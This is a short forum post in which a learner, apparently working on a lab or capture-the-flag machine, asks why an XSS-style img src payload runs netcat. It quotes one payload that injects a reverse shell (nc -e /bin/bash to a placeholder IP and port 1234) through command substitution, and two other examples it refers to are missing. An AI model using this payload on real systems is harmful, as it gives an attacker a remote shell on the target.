Hello guys,
I have a question about XSS in javascript
I working on a machine right now that requires to exploit XSS vulnerability
Its working with <img src=
This is the payload that im using
<img src=http://ipaddress/$(nc.traditional$IFS-e$IFS/bin/bash$IFS’ipaddress’$IFS’1234’)>
Can some one explain to me how the netcat is getting executed here if im loading and image?
Also i have tried to do it with
but it did not work, i could see the request on my machine.
Also it is possible to execute the same payload as <img src= but with <script?
Something like
Sorry for this NOOB question, im just trying to understand the logic behind it.
Thanks.